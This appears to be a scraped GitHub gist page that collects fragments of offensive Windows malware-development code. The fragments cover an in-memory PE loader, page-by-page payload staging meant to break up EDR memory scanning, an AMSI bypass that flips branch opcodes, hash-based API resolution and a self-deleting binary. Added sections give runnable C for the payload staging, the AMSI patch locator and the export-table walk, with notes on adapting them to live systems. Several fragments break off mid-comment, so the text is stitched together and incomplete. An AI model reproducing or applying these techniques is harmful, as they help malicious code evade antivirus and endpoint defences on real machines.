This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// CRT independent printing function
// Formats into a heap buffer and writes it with WriteConsoleA, so no printf/stdio has to be linked in.
// The first conversion in msg receives __func__; wsprintfA caps its output at 1024 bytes, which is why the buffer is that size.
#define print(msg, ...) \
if (1) { \
    LPSTR Buf = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024); \
    if (Buf) { \
        int len = wsprintfA(Buf, msg "\n", __func__, __VA_ARGS__); \
        WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), Buf, len, 0, 0); \
        HeapFree(GetProcessHeap(), 0x00, Buf); \
    } \
}
/*
@brief
    Load a PE in memory and execute it in the address space of this process
@author
    wizardy0ga
@usage:
    LoadPe.exe <path to exe>
#pragma once
#include <windows.h>
#include <stdio.h>
#define SEED_HASH 8888
#define KERNEL32_HASH 0xA52DE12A
#define LOAD_LIBRARY_HASH 0xF4DAB6A4
typedef struct _UNICODE_STRING_
{
/*
Description:
    Copies a payload into memory one page at a time using NTAPI calls. Splitting the payload across separately
    committed pages assists with breaking up the memory scanning routines of EDRs.
    A reserved / read-only page is left at the top of the allocation. Each page below it holds one chunk of the payload.
    | Page 1   | 4096 bytes | Reserved  | R  |
    | Page 2   | 4096 bytes | Committed | RX |
    | Page 3   | 4096 bytes | Committed | RX |
    | Page ... | 4096 bytes | Committed | RX |
/*
Description:
    Copies a payload into memory one page at a time. Splitting the payload across separately committed pages
    assists with breaking up the memory scanning routines of EDRs.
    A reserved / read-only page is left at the top of the allocation. Each page below it holds one chunk of the payload.
    | Page 1   | 4096 bytes | Reserved  | R  |
    | Page 2   | 4096 bytes | Committed | RX |
    | Page 3   | 4096 bytes | Committed | RX |
    | Page ... | 4096 bytes | Committed | RX |
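The page layout described by the two chunking gists above, written out as an added example that is not one of the gists themselves. It reserves the whole region up front, leaves page 1 reserved and never committed, then commits, fills and flips each payload page to RX one at a time. To keep it runnable anywhere, the Windows branch uses VirtualAlloc/VirtualProtect instead of the NTAPI calls the gist mentions (that substitution is mine), and the POSIX branch uses mmap/mprotect; the 2.5-page payload in the self-test is constructed data.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
static size_t page_size(void) { SYSTEM_INFO si; GetSystemInfo(&si); return si.dwPageSize; }
static void *reserve_region(size_t len) { return VirtualAlloc(NULL, len, MEM_RESERVE, PAGE_NOACCESS); }
static int commit_rw(void *p, size_t len) { return VirtualAlloc(p, len, MEM_COMMIT, PAGE_READWRITE) != NULL; }
static int make_rx(void *p, size_t len) { DWORD old; return VirtualProtect(p, len, PAGE_EXECUTE_READ, &old) != 0; }
static void release_region(void *base, size_t len) { (void)len; VirtualFree(base, 0, MEM_RELEASE); }
#else
#include <sys/mman.h>
#include <unistd.h>
static size_t page_size(void) { return (size_t)sysconf(_SC_PAGESIZE); }
static void *reserve_region(size_t len) {
    /* PROT_NONE mapping: the POSIX equivalent of a reserved, uncommitted region */
    void *p = mmap(NULL, len, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}
static int commit_rw(void *p, size_t len) { return mprotect(p, len, PROT_READ | PROT_WRITE) == 0; }
static int make_rx(void *p, size_t len) { return mprotect(p, len, PROT_READ | PROT_EXEC) == 0; }
static void release_region(void *base, size_t len) { munmap(base, len); }
#endif

/* Lay the payload out as [page 1: reserved, never committed][page 2..N: RX chunks].
 * Returns a pointer to page 2 (where execution would start) or NULL on failure;
 * *total_out receives the region length for chunked_release(). */
unsigned char *chunked_copy(const unsigned char *payload, size_t len, size_t *total_out)
{
    size_t ps = page_size();
    size_t pages = (len + ps - 1) / ps;          /* payload pages */
    size_t total = (pages + 1) * ps;             /* plus the guard page on top */
    unsigned char *base = reserve_region(total);
    if (!base) return NULL;

    for (size_t i = 0; i < pages; i++) {
        unsigned char *page = base + (i + 1) * ps;            /* page 1 is skipped */
        size_t chunk = (i == pages - 1) ? len - i * ps : ps;  /* last chunk may be short */
        if (!commit_rw(page, ps)) goto fail;                  /* commit exactly one page */
        memcpy(page, payload + i * ps, chunk);                /* one chunk per page */
        if (!make_rx(page, ps)) goto fail;                    /* RX only after the write */
    }
    *total_out = total;
    return base + ps;
fail:
    release_region(base, total);
    return NULL;
}

void chunked_release(unsigned char *first_payload_page, size_t total)
{
    release_region(first_payload_page - page_size(), total);
}

/* Self-check on a constructed 2.5-page payload filled with a counter pattern. */
int chunked_selftest(void)
{
    size_t ps = page_size(), len = ps * 2 + ps / 2, total = 0;
    unsigned char *payload = malloc(len);
    if (!payload) return 0;
    for (size_t i = 0; i < len; i++) payload[i] = (unsigned char)(i * 7);
    unsigned char *dst = chunked_copy(payload, len, &total);
    int ok = dst != NULL
          && total == 4 * ps                    /* 3 payload pages + 1 guard page */
          && ((uintptr_t)dst % ps) == 0         /* payload starts on a page boundary */
          && memcmp(dst, payload, len) == 0;    /* RX pages are still readable */
    if (dst) chunked_release(dst, total);
    free(payload);
    return ok;
}

int main(void)
{
    printf("chunked copy self-test: %s\n", chunked_selftest() ? "ok" : "FAILED");
    return 0;
}
```

Note that the guard page is never committed, so a scanner walking the region from its base faults on the first page, while each payload page is a separate protection change rather than one large RWX-to-RX transition.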
/*
Description:
    Program is a PoC DRM implementation. The program will only execute on the Windows device that it first executed
    on. If it is copied to another device, it will delete itself on execution.
    A signature is kept in the .rdata section of the binary. On first execution, if the signature is the default signature,
    DRM will be initialized. This process consists of hashing the BIOS's UUID and replacing the default signature with this
    hash. When the program executes again, it will check the BIOS's UUID hash against the signature stored in the
    .rdata section. If the hash doesn't match, the program deletes itself.
#include <windows.h>
#include <winternl.h>
#define STREAM_NAME L":XanWudS"
BOOL SelfDelete()
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    PWSTR szImageName = NULL;
    FILE_DISPOSITION_INFO DisposalInfo = { .DeleteFile = TRUE };
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#define RET 0xC3
#define INT3 0xCC
#define JE 0x74
#define JNE 0x75
#define MOV 0xB8
/*
Description:
    Bypasses AMSI by patching its functions in memory with single-byte patches. Some AMSI functions
    validate their parameters and jump to a failure routine if the validation fails. By flipping this check,
    the functions can be forced to fail, which blinds the Antimalware Scan Interface.
Author:
    wizardy0ga
Date:
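The check-flip the AMSI gist describes, as an added example that is not the gist's own code. It uses the opcode constants from the header above to locate a `je rel8` whose target is a `mov eax, imm32 ; ret` failure stub, verifies the byte really is a JE before touching it, and flips it to JNE. The bytes it runs on are a constructed stand-in for an AMSI function, not a real one: real offsets and the exact validation sequence differ between amsi.dll builds and must be located per version, and on a live function the page has to be made writable (VirtualProtect to PAGE_EXECUTE_READWRITE and back) around the one-byte write, which this demo deliberately leaves out.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define RET 0xC3
#define JE  0x74
#define JNE 0x75
#define MOV 0xB8

/* Constructed stand-in for a parameter check: a decoy je at offset 0 whose
 * target is not a failure stub, then test rdx,rdx / je to a
 * `mov eax, 0x80070057 ; ret` (E_INVALIDARG) stub at offset 13. */
static const unsigned char sample[] = {
    0x74, 0x01,                     /* 0:  je  +1   (decoy, target is a nop)   */
    0x90,                           /* 2:  nop                                  */
    0x48, 0x85, 0xD2,               /* 3:  test rdx, rdx                        */
    0x74, 0x05,                     /* 6:  je  +5   -> failure stub at 13       */
    0x48, 0x8B, 0xC1,               /* 8:  mov rax, rcx   (happy path)          */
    0x90,                           /* 11: nop                                  */
    0xC3,                           /* 12: ret                                  */
    0xB8, 0x57, 0x00, 0x07, 0x80,   /* 13: mov eax, 0x80070057                  */
    0xC3,                           /* 18: ret                                  */
};

/* Return the offset of the first `je rel8` that branches to a `mov eax, imm32 ; ret`
 * stub, or -1. rel8 is signed and the target is bounds-checked so a stray 0x74
 * inside an immediate cannot send the scan out of the buffer. */
long find_failure_je(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if (code[i] != JE) continue;
        long target = (long)i + 2 + (signed char)code[i + 1];
        if (target < 0 || (size_t)target + 5 >= len) continue;
        if (code[target] == MOV && code[target + 5] == RET) return (long)i;
    }
    return -1;
}

/* Flip the located JE to JNE. Writes only if the byte really is JE, so a stale
 * offset or an already-patched function is never corrupted. 1 on success. */
int flip_je_to_jne(unsigned char *code, size_t len, long off)
{
    if (off < 0 || (size_t)off >= len) return 0;
    if (code[off] != JE) return 0;
    code[off] = JNE;
    return 1;
}

/* Self-check: the decoy is skipped, the real check is flipped once, and a
 * second pass refuses because the byte is no longer a JE. */
int patch_selftest(void)
{
    unsigned char code[sizeof sample];
    memcpy(code, sample, sizeof sample);
    long off = find_failure_je(code, sizeof code);
    if (off != 6) return 0;
    if (!flip_je_to_jne(code, sizeof code, off)) return 0;
    if (code[6] != JNE) return 0;
    if (flip_je_to_jne(code, sizeof code, off)) return 0;
    return 1;
}

int main(void)
{
    printf("patch self-test: %s\n", patch_selftest() ? "ok" : "FAILED");
    return 0;
}
```

After the flip the function takes the failure stub whenever the parameters are valid, which is the "forced to fail" behaviour the description relies on; a scan that flipped every 0x74 it found, without resolving the branch target, would also corrupt unrelated branches and crash the host.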
/*
Description:
    A simplified version of GetProcAddress. Posting here for reference later.
Author:
    WizardY0ga
Mitre:
    T1027.007 - Obfuscated Files or Information: Dynamic API Resolution
Date:
    October 2024
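The export-table walk that a GetProcAddress replacement performs, paired with the hash-based lookup implied by the KERNEL32_HASH / LOAD_LIBRARY_HASH header further up. This is an added example, not the gist's code: the hash routine (a seeded djb2 variant) is mine, so its values do not reproduce the constants in that header, and the export directory it walks is a constructed in-memory toy whose RVAs are offsets into a local buffer rather than a real loaded module. The struct mirrors IMAGE_EXPORT_DIRECTORY field for field so the same walk applies to a real module base.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SEED_HASH 8888   /* same seed value as the header; hash algorithm below is mine */

/* Portable mirror of IMAGE_EXPORT_DIRECTORY (field order and widths as in winnt.h). */
typedef struct {
    uint32_t Characteristics, TimeDateStamp;
    uint16_t MajorVersion, MinorVersion;
    uint32_t Name, Base, NumberOfFunctions, NumberOfNames;
    uint32_t AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals;
} export_dir_t;

/* Seeded, case-sensitive string hash. In a real loader only the precomputed
 * 32-bit result is stored, so the API name never appears in the binary. */
uint32_t hash_name(const char *s, uint32_t seed)
{
    uint32_t h = seed;
    while (*s) h = h * 33 + (unsigned char)*s++;
    return h;
}

/* The GetProcAddress walk: AddressOfNames[i] -> hash compare ->
 * AddressOfNameOrdinals[i] -> AddressOfFunctions[ordinal]. `image` is the
 * module base; every RVA is relative to it. Returns the function RVA, 0 if absent. */
uint32_t resolve_by_hash(const uint8_t *image, const export_dir_t *ed, uint32_t want, uint32_t seed)
{
    const uint32_t *names = (const uint32_t *)(image + ed->AddressOfNames);
    const uint16_t *ords  = (const uint16_t *)(image + ed->AddressOfNameOrdinals);
    const uint32_t *funcs = (const uint32_t *)(image + ed->AddressOfFunctions);
    for (uint32_t i = 0; i < ed->NumberOfNames; i++) {
        if (hash_name((const char *)(image + names[i]), seed) != want) continue;
        uint16_t ord = ords[i];                       /* NOT i: names and functions are indexed differently */
        if (ord >= ed->NumberOfFunctions) return 0;   /* corrupt table guard */
        return funcs[ord];
    }
    return 0;
}

/* Constructed toy module: three names (sorted, as in a real table) whose
 * ordinals are deliberately out of name order so the indirection is exercised. */
static uint32_t image_buf[64];   /* uint32_t storage keeps the RVA arrays aligned */

const export_dir_t *build_toy_exports(uint8_t **image_out)
{
    uint8_t *img = (uint8_t *)image_buf;
    memset(image_buf, 0, sizeof image_buf);
    export_dir_t *ed = (export_dir_t *)img;          /* directory at RVA 0 */
    uint32_t *funcs = (uint32_t *)(img + 40);        /* RVA 40: 3 x uint32 */
    uint32_t *names = (uint32_t *)(img + 52);        /* RVA 52: 3 x uint32 */
    uint16_t *ords  = (uint16_t *)(img + 64);        /* RVA 64: 3 x uint16 */
    const char *strs[3] = { "CreateFileW", "LoadLibraryA", "VirtualAlloc" };
    uint32_t off = 72;                               /* name strings start at RVA 72 */
    for (int i = 0; i < 3; i++) {
        names[i] = off;
        strcpy((char *)img + off, strs[i]);
        off += (uint32_t)strlen(strs[i]) + 1;
    }
    funcs[0] = 0x1000;  /* ordinal 0: VirtualAlloc */
    funcs[1] = 0x2000;  /* ordinal 1: CreateFileW  */
    funcs[2] = 0x3000;  /* ordinal 2: LoadLibraryA */
    ords[0] = 1; ords[1] = 2; ords[2] = 0;           /* name index -> ordinal */
    ed->Base = 1; ed->NumberOfFunctions = 3; ed->NumberOfNames = 3;
    ed->AddressOfFunctions = 40; ed->AddressOfNames = 52; ed->AddressOfNameOrdinals = 64;
    *image_out = img;
    return ed;
}

/* Convenience: resolve a name against the toy module by its hash. */
uint32_t lookup_toy(const char *name)
{
    uint8_t *img;
    const export_dir_t *ed = build_toy_exports(&img);
    return resolve_by_hash(img, ed, hash_name(name, SEED_HASH), SEED_HASH);
}

int main(void)
{
    printf("LoadLibraryA -> RVA 0x%x (hash 0x%08x)\n",
           lookup_toy("LoadLibraryA"), hash_name("LoadLibraryA", SEED_HASH));
    return 0;
}
```

Two things a real implementation adds on top of this walk: a forwarded export (a function RVA that falls inside the export directory's own range) must be resolved by loading the named module and repeating the walk there, and because the walk reads the in-memory copy of the module it sees whatever hooks an EDR has already placed on the exported function.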